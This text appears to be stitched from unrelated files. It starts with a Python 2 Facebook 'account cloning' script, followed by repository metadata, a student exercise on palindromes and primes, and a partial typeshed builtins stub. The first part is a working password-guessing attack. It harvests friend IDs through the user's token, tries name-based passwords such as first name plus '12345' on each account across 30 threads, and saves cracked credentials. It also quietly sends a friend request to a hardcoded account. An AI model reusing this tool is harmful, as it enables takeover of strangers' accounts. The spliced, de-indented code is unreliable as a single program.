print(' \033[1;94m▬\x1b[1;94m✔✔✔✔✔✔✔LOGIN WITH FACEBOOK✔✔✔✔✔✔✔\x1b[1;94m▬' )
print(' ' )
id = raw_input('\033[1;91m[+] \x1b[1;94mID/Email\x1b[1;95m: \x1b[1;93m')
pwd = raw_input('\033[1;91m[+] \x1b[1;91mPassword\x1b[1;96m: \x1b[1;93m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\x1b[1;96mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;92mLogin Successful.•◈•..'
os.system('xdg-open https://m.youtube.com/channel/UCRrRgcJjsnNm5Bi5ZenRGnw')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\x1b[1;93mYour Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\x1b[1;94mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;91mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;92mThere is no internet connection"
keluar()
os.system("clear") #Dev:love_hacker
print logo
print " \033[1;92m«----•◈••◈•----\033[1;93mLogged in User Info\033[1;92m----•◈••◈•-----»"
print " \033[1;91m Name\033[1;93m:\033[1;92m"+nama+"\033[1;93m "
print " \033[1;91m ID\033[1;93m:\033[1;92m"+id+"\x1b[1;93m "
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•\033[1;93mKali.linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•"
print "\033[1;97m-•◈•-\033[1;92m> \033[1;92m1.\x1b[1;92mStart Cloning..."
print "\033[1;97m-•◈•-\033[1;91m> \033[1;91m0.\033[1;91mExit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;91mChoose an Option>>> \033[1;97m")
if unikers =="":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;92m-•◈•-\033[1;91m> \033[1;92m1.\x1b[1;91mClone From Friend List."
print "\033[1;92m-•◈•-\033[1;91m> \033[1;92m2.\x1b[1;91mClone Friend List Public ID."
print "\033[1;92m-•◈•-\033[1;91m> \033[1;92m0.\033[1;92mBack"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;91mChoose an Option>>> \033[1;97m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;93mKali.linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•"
jalan('\033[1;93mGetting IDs \033[1;93m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;92m[•◈•] \033[1;92mEnter ID\033[1;93m: \033[1;95m")
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;93mKali.linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;93mName\033[1;93m:\033[1;97m "+op["name"]
except KeyError:
print"\x1b[1;92mID Not Found!"
raw_input("\n\033[1;92m[\033[1;91mBack\033[1;92m]")
super()
print"\033[1;93mGetting IDs\033[1;92m..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="0":
menu()
else:
print "\x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;91mTotal IDs\033[1;93m: \033[1;94m"+str(len(id))
jalan('\033[1;92mPlease Wait\033[1;93m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91mCloning\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;92m«--•◈••◈•---\x1b[1;93m•◈•Stop Process Press CTRL+Z•◈•\033[1;92m---•◈••◈•-»"
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;93mKali.linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•"
jalan(' \033[1;93m🔎🔎🔎🔎🔎🔎🔎\033[1;94mCloning Start..\033[1;93m🔍🔍🔍🔍🔍🔍🔍 ')
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;93mKali.linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•"
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass #Dev:love_hacker
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['last_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] +'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;94m✙\x1b[1;97m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['last_name'] + b['last_name']
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name'] + b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;93mKali.Linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
print " \033[1;93m«---•◈•---Developed By love-Hacker--•◈•---»" #Dev:love_hacker
print '\033[1;91m✅Process Has Been Completed Press➡ Ctrl+Z.↩ Next Type (python2 World.py)↩\033[1;92m....'
print"\033[1;91mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;91m"+str(len(oks))+"\033[1;97m/\033[1;95m"+str(len(cekpoint))
print """
╔══╗░░░░╔╦╗░░╔═════╗ harshu
║╚═╬════╬╣╠═╗║░▀░▀░║ indian
╠═╗║╔╗╔╗║║║╩╣║╚═══╝║ WhatsApp
╚══╩╝╚╝╚╩╩╩═╝╚═════╝ xxxxxxxxx
Checkpoint ID Open After 7 Days
•\033[1;91m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.
: \033[1;93m .....harshudubey Kali.linux....... \033[1;91m :
•\033[1;91m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.'
WhatsApp Num
\033[1;93m +xxxxxxxxx"""
raw_input("\n\033[1;92m[\033[1;91mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
noreply@github.com
|
ae98570c90dd3ee5fc9a254f560b3788e9a1a2e9
|
7e15ff5ffc93ffe8aacf3675e82f37ead51843a2
|
/main.py
|
6c9459540d31a451942dc9d8f0834beb4b4d0924
|
[] |
no_license
|
AP-MI-2021/lab-2-ale-stanciu
|
727532fdae7af58d17d90f3540f7f9f410dd1f99
|
5e471fdc5138dea5479658e83c1fbaf856e0b945
|
refs/heads/main
| 2023-08-31T20:06:53.338845
| 2021-10-06T06:37:31
| 2021-10-06T06:37:31
| 411,532,189
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,337
|
py
|
def is_palindrome(n):
    """
    Determines whether a number is a palindrome.
    :param n: an integer
    :return: True if it is a palindrome, False otherwise
    """
    cn = n
    oglindit = 0
    while cn != 0:
        oglindit = cn % 10 + oglindit * 10
        cn = cn // 10
    if n == oglindit:
        return True
    return False


def test_is_palindrome():
    assert is_palindrome(565) == True
    assert is_palindrome(567) == False
def is_prime(n):
    """
    Determines whether a number is prime.
    :param n: an integer
    :return: True if n is prime, False otherwise
    """
    if n < 2:
        return False
    for i in range(2, n // 2 + 1):
        if n % i == 0:
            return False
    return True


def is_superprime(n):
    """
    Determines whether a number is a superprime,
    i.e. all of its prefixes are prime.
    :param n: an integer
    :return: True if n is a superprime, False otherwise
    """
    while n != 0:
        if not is_prime(n):
            return False
        n = n // 10
    return True


def test_is_superprime():
    assert is_superprime(73) == True
    assert is_superprime(246) == False
def get_largest_prime_below(n):
    """
    Finds the largest prime number smaller than a given number.
    :param n: an integer
    :return: the largest prime smaller than n, or a message if there is none
    """
    for i in range(n - 1, 2, -1):
        if is_prime(i):
            return i
    return "There is no such number"


def test_get_largest_prime_below():
    assert get_largest_prime_below(3) == "There is no such number"
    assert get_largest_prime_below(32) == 31
    assert get_largest_prime_below(10) == 7
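

# Aggregate check (an illustrative addition, not required by the lab statement):
# calling run_all_tests() executes the three test functions defined above and
# raises an AssertionError if any expectation fails.
def run_all_tests():
    test_is_palindrome()
    test_is_superprime()
    test_get_largest_prime_below()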
def main():
    shouldRun = True
    while shouldRun:
        print("1. Determine whether a given number is a palindrome.")
        print("2. Determine whether a number is a superprime: all of its prefixes are prime.")
        print("3. Find the largest prime number smaller than a given number.")
        optiune = input("Enter an option: ")
        if optiune == "1":
            n = int(input("Enter a number: "))
            print(is_palindrome(n))
        elif optiune == "2":
            x = int(input("Enter a number: "))
            print(is_superprime(x))
        elif optiune == "3":
            a = int(input("Enter a number: "))
            print(get_largest_prime_below(a))
        elif optiune == "x":
            shouldRun = False
        else:
            print("Invalid option!")
if __name__ == '__main__':
main()
|
[
"aleestanciu@gmail.com"
] |
aleestanciu@gmail.com
|
206fdb7aee191629e73417be7113cc20964499a7
|
1b1b8ecceb3638719ea2657fa2032304f4ed77be
|
/Week2/Sqrts v.2.py
|
ddc4d6ad0cb66cf9462cef2493c814e7e9448859
|
[] |
no_license
|
IndependentDeveloper1/PyCourse
|
ee649812835f9c153410afe7912dd41616c531bf
|
e807a30ad88d69824f692b0e4eed101de2d5d607
|
refs/heads/master
| 2021-08-27T21:48:50.195313
| 2019-04-23T08:42:58
| 2019-04-23T08:42:58
| 182,575,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 103
|
py
|
# Read n and print the sum of the first n squares: 1^2 + 2^2 + ... + n^2.
n = int(input())
num = 1
numSum = 0
while num <= n:
    numSum += num * num
    num += 1
print(numSum)
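
# Illustrative check (an addition, not in the original solution): the loop result
# agrees with the closed-form formula for the sum of the first n squares,
# n*(n+1)*(2n+1)/6, so the whole loop could be replaced by a single expression.
assert numSum == n * (n + 1) * (2 * n + 1) // 6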
|
[
"40405436+IndependentDeveloper1@users.noreply.github.com"
] |
40405436+IndependentDeveloper1@users.noreply.github.com
|
a1b319d7316abd8fab6acf241849f8384c7b2092
|
31fae1d7ae1b3e5326db5935749ce2dd359e3827
|
/malabar/config.py
|
8cbcac8ccba4e2fe44b374cf34ab15582f8eaa48
|
[] |
no_license
|
tomrtc/pyotecmalabar
|
98fb4dde37a5753c6dffcd5eab703e174fb2a706
|
f49f5c8726dee54988d7b511e7f6287044009dec
|
refs/heads/master
| 2021-01-10T20:36:51.114167
| 2015-11-20T17:31:40
| 2015-11-20T17:31:40
| 42,729,090
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,017
|
py
|
import configparser
import click
import os
import pprint as pretty
CONFIGURATION_APPLICATION_PATH = click.get_app_dir('malabar')
CONFIGURATION_FILE_NAME = os.path.join(CONFIGURATION_APPLICATION_PATH,
'configuration.ini')
DEFAULT_GROUP = 'otec'
RSS_DATABASE_FILE_PATH = os.path.join(CONFIGURATION_APPLICATION_PATH,
'rss.db')
OTEC_TEMPLATE_RSS_URI = "http://cdafactory.pqa-collab.fr.alcatel-lucent.com/rss.php"
class OtecCfg:
def __init__(self, sfile, _interpolation):
self.configparser = configparser.ConfigParser(interpolation=_interpolation)
self.configparser.read(sfile)
def getDefaultSettings(self):
return self.getSettings(DEFAULT_GROUP)
def getSettings(self, group):
return self.configparser[group]
def get_configuration(config_file_name, interpolation=None):
return OtecCfg(config_file_name, interpolation)
def create_default_config_file():
genCFG = configparser.ConfigParser(allow_no_value=True,
interpolation=None)
genCFG[DEFAULT_GROUP] = {'; Warning autogenerated file, Must be reviewed': 'WARNING',
'rss-uri': OTEC_TEMPLATE_RSS_URI,
'host': 'bull6-05.fr.alcatel-lucent.com',
'; This should be a comment! ;-)':'Ornot',
'user': 'root',
'password': 'letacla',
'ovf-directory': '/tmp',
'Compression': 'yes'}
genCFG['SystemUnderTest'] = {}
if not os.path.exists(CONFIGURATION_APPLICATION_PATH):
os.makedirs(CONFIGURATION_APPLICATION_PATH)
with open(CONFIGURATION_FILE_NAME, 'w') as configfile:
genCFG.write(configfile)
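

# Illustrative usage sketch (not part of the original module): one plausible way to
# bootstrap the configuration file on first run and dump the default [otec] section.
# Only names defined above are used; the __main__ guard is an assumption for demo purposes.
if __name__ == '__main__':
    if not os.path.exists(CONFIGURATION_FILE_NAME):
        create_default_config_file()
    settings = get_configuration(CONFIGURATION_FILE_NAME).getDefaultSettings()
    pretty.pprint(dict(settings))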
|
[
"Remy.Tomasetto@alcatel-lucent.com"
] |
Remy.Tomasetto@alcatel-lucent.com
|
a291c7bfaadb64ce0f0f8fe7ff044a54344a7ba5
|
77c8d29caad199fb239133e6267d1b75bd2dfe48
|
/packages/pyright-internal/typeshed-fallback/stdlib/builtins.pyi
|
78b29c5aa7e794980ce9212e92a26b6fbb0c2072
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
simpoir/pyright
|
9c80e596f99dfd1341a55373a96d8795cb72fb56
|
320a0a2fd31e4ffc69d4bd96d7202bbe8d8cb410
|
refs/heads/master
| 2023-04-18T06:42:16.194352
| 2021-04-29T15:20:19
| 2021-04-29T15:20:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 54,998
|
pyi
|
import sys
import types
from _typeshed import (
AnyPath,
OpenBinaryMode,
OpenBinaryModeReading,
OpenBinaryModeUpdating,
OpenBinaryModeWriting,
OpenTextMode,
ReadableBuffer,
SupportsDivMod,
SupportsKeysAndGetItem,
SupportsLessThan,
SupportsLessThanT,
SupportsRDivMod,
SupportsWrite,
)
from ast import AST, mod
from io import BufferedRandom, BufferedReader, BufferedWriter, FileIO, TextIOWrapper
from types import CodeType, TracebackType
from typing import (
IO,
AbstractSet,
Any,
BinaryIO,
ByteString,
Callable,
Container,
Dict,
FrozenSet,
Generic,
ItemsView,
Iterable,
Iterator,
KeysView,
List,
Mapping,
MutableMapping,
MutableSequence,
MutableSet,
NoReturn,
Optional,
Protocol,
Reversible,
Sequence,
Set,
Sized,
SupportsAbs,
SupportsBytes,
SupportsComplex,
SupportsFloat,
SupportsInt,
SupportsRound,
Tuple,
Type,
TypeVar,
Union,
ValuesView,
overload,
runtime_checkable,
)
from typing_extensions import Literal
if sys.version_info >= (3, 9):
from types import GenericAlias
class _SupportsIndex(Protocol):
def __index__(self) -> int: ...
class _SupportsTrunc(Protocol):
def __trunc__(self) -> int: ...
_T = TypeVar("_T")
_T_co = TypeVar("_T_co", covariant=True)
_T_contra = TypeVar("_T_contra", contravariant=True)
_KT = TypeVar("_KT")
_VT = TypeVar("_VT")
_S = TypeVar("_S")
_T1 = TypeVar("_T1")
_T2 = TypeVar("_T2")
_T3 = TypeVar("_T3")
_T4 = TypeVar("_T4")
_T5 = TypeVar("_T5")
_TT = TypeVar("_TT", bound="type")
_TBE = TypeVar("_TBE", bound="BaseException")
class object:
__doc__: Optional[str]
__dict__: Dict[str, Any]
__slots__: Union[str, Iterable[str]]
__module__: str
__annotations__: Dict[str, Any]
@property
def __class__(self: _T) -> Type[_T]: ...
# Ignore errors about type mismatch between property getter and setter
@__class__.setter
def __class__(self, __type: Type[object]) -> None: ... # type: ignore # noqa: F811
def __init__(self) -> None: ...
def __new__(cls) -> Any: ...
def __setattr__(self, name: str, value: Any) -> None: ...
def __eq__(self, o: object) -> bool: ...
def __ne__(self, o: object) -> bool: ...
def __str__(self) -> str: ...
def __repr__(self) -> str: ...
def __hash__(self) -> int: ...
def __format__(self, format_spec: str) -> str: ...
def __getattribute__(self, name: str) -> Any: ...
def __delattr__(self, name: str) -> None: ...
def __sizeof__(self) -> int: ...
def __reduce__(self) -> Union[str, Tuple[Any, ...]]: ...
def __reduce_ex__(self, protocol: int) -> Union[str, Tuple[Any, ...]]: ...
def __dir__(self) -> Iterable[str]: ...
def __init_subclass__(cls) -> None: ...
class staticmethod(object): # Special, only valid as a decorator.
__func__: Callable[..., Any]
__isabstractmethod__: bool
def __init__(self, f: Callable[..., Any]) -> None: ...
def __new__(cls: Type[_T], *args: Any, **kwargs: Any) -> _T: ...
def __get__(self, obj: _T, type: Optional[Type[_T]] = ...) -> Callable[..., Any]: ...
class classmethod(object): # Special, only valid as a decorator.
__func__: Callable[..., Any]
__isabstractmethod__: bool
def __init__(self, f: Callable[..., Any]) -> None: ...
def __new__(cls: Type[_T], *args: Any, **kwargs: Any) -> _T: ...
def __get__(self, obj: _T, type: Optional[Type[_T]] = ...) -> Callable[..., Any]: ...
class type(object):
__base__: type
__bases__: Tuple[type, ...]
__basicsize__: int
__dict__: Dict[str, Any]
__dictoffset__: int
__flags__: int
__itemsize__: int
__module__: str
__mro__: Tuple[type, ...]
__name__: str
__qualname__: str
__text_signature__: Optional[str]
__weakrefoffset__: int
@overload
def __init__(self, o: object) -> None: ...
@overload
def __init__(self, name: str, bases: Tuple[type, ...], dict: Dict[str, Any], **kwds: Any) -> None: ...
@overload
def __new__(cls, o: object) -> type: ...
@overload
def __new__(cls, name: str, bases: Tuple[type, ...], namespace: Dict[str, Any], **kwds: Any) -> type: ...
def __call__(self, *args: Any, **kwds: Any) -> Any: ...
def __subclasses__(self: _TT) -> List[_TT]: ...
    # Note: the documentation doesn't specify what the return type is; the standard
    # implementation seems to return a list.
def mro(self) -> List[type]: ...
def __instancecheck__(self, instance: Any) -> bool: ...
def __subclasscheck__(self, subclass: type) -> bool: ...
@classmethod
def __prepare__(metacls, __name: str, __bases: Tuple[type, ...], **kwds: Any) -> Mapping[str, Any]: ...
if sys.version_info >= (3, 10):
def __or__(self, t: Any) -> types.Union: ...
class super(object):
@overload
def __init__(self, t: Any, obj: Any) -> None: ...
@overload
def __init__(self, t: Any) -> None: ...
@overload
def __init__(self) -> None: ...
class int:
@overload
def __new__(cls: Type[_T], x: Union[str, bytes, SupportsInt, _SupportsIndex, _SupportsTrunc] = ...) -> _T: ...
@overload
def __new__(cls: Type[_T], x: Union[str, bytes, bytearray], base: int) -> _T: ...
if sys.version_info >= (3, 8):
def as_integer_ratio(self) -> Tuple[int, Literal[1]]: ...
@property
def real(self) -> int: ...
@property
def imag(self) -> int: ...
@property
def numerator(self) -> int: ...
@property
def denominator(self) -> int: ...
def conjugate(self) -> int: ...
def bit_length(self) -> int: ...
def to_bytes(self, length: int, byteorder: str, *, signed: bool = ...) -> bytes: ...
@classmethod
def from_bytes(
cls, bytes: Union[Iterable[int], SupportsBytes], byteorder: str, *, signed: bool = ...
) -> int: ... # TODO buffer object argument
def __add__(self, x: int) -> int: ...
def __sub__(self, x: int) -> int: ...
def __mul__(self, x: int) -> int: ...
def __floordiv__(self, x: int) -> int: ...
def __truediv__(self, x: int) -> float: ...
def __mod__(self, x: int) -> int: ...
def __divmod__(self, x: int) -> Tuple[int, int]: ...
def __radd__(self, x: int) -> int: ...
def __rsub__(self, x: int) -> int: ...
def __rmul__(self, x: int) -> int: ...
def __rfloordiv__(self, x: int) -> int: ...
def __rtruediv__(self, x: int) -> float: ...
def __rmod__(self, x: int) -> int: ...
def __rdivmod__(self, x: int) -> Tuple[int, int]: ...
@overload
def __pow__(self, __x: Literal[2], __modulo: Optional[int] = ...) -> int: ...
@overload
def __pow__(self, __x: int, __modulo: Optional[int] = ...) -> Any: ... # Return type can be int or float, depending on x.
def __rpow__(self, x: int, mod: Optional[int] = ...) -> Any: ...
def __and__(self, n: int) -> int: ...
def __or__(self, n: int) -> int: ...
def __xor__(self, n: int) -> int: ...
def __lshift__(self, n: int) -> int: ...
def __rshift__(self, n: int) -> int: ...
def __rand__(self, n: int) -> int: ...
def __ror__(self, n: int) -> int: ...
def __rxor__(self, n: int) -> int: ...
def __rlshift__(self, n: int) -> int: ...
def __rrshift__(self, n: int) -> int: ...
def __neg__(self) -> int: ...
def __pos__(self) -> int: ...
def __invert__(self) -> int: ...
def __trunc__(self) -> int: ...
def __ceil__(self) -> int: ...
def __floor__(self) -> int: ...
def __round__(self, ndigits: Optional[int] = ...) -> int: ...
def __getnewargs__(self) -> Tuple[int]: ...
def __eq__(self, x: object) -> bool: ...
def __ne__(self, x: object) -> bool: ...
def __lt__(self, x: int) -> bool: ...
def __le__(self, x: int) -> bool: ...
def __gt__(self, x: int) -> bool: ...
def __ge__(self, x: int) -> bool: ...
def __str__(self) -> str: ...
def __float__(self) -> float: ...
def __int__(self) -> int: ...
def __abs__(self) -> int: ...
def __hash__(self) -> int: ...
def __bool__(self) -> bool: ...
def __index__(self) -> int: ...
class float:
def __new__(cls: Type[_T], x: Union[SupportsFloat, _SupportsIndex, str, bytes, bytearray] = ...) -> _T: ...
def as_integer_ratio(self) -> Tuple[int, int]: ...
def hex(self) -> str: ...
def is_integer(self) -> bool: ...
@classmethod
def fromhex(cls, __s: str) -> float: ...
@property
def real(self) -> float: ...
@property
def imag(self) -> float: ...
def conjugate(self) -> float: ...
def __add__(self, x: float) -> float: ...
def __sub__(self, x: float) -> float: ...
def __mul__(self, x: float) -> float: ...
def __floordiv__(self, x: float) -> float: ...
def __truediv__(self, x: float) -> float: ...
def __mod__(self, x: float) -> float: ...
def __divmod__(self, x: float) -> Tuple[float, float]: ...
def __pow__(
self, x: float, mod: None = ...
) -> float: ... # In Python 3, returns complex if self is negative and x is not whole
def __radd__(self, x: float) -> float: ...
def __rsub__(self, x: float) -> float: ...
def __rmul__(self, x: float) -> float: ...
def __rfloordiv__(self, x: float) -> float: ...
def __rtruediv__(self, x: float) -> float: ...
def __rmod__(self, x: float) -> float: ...
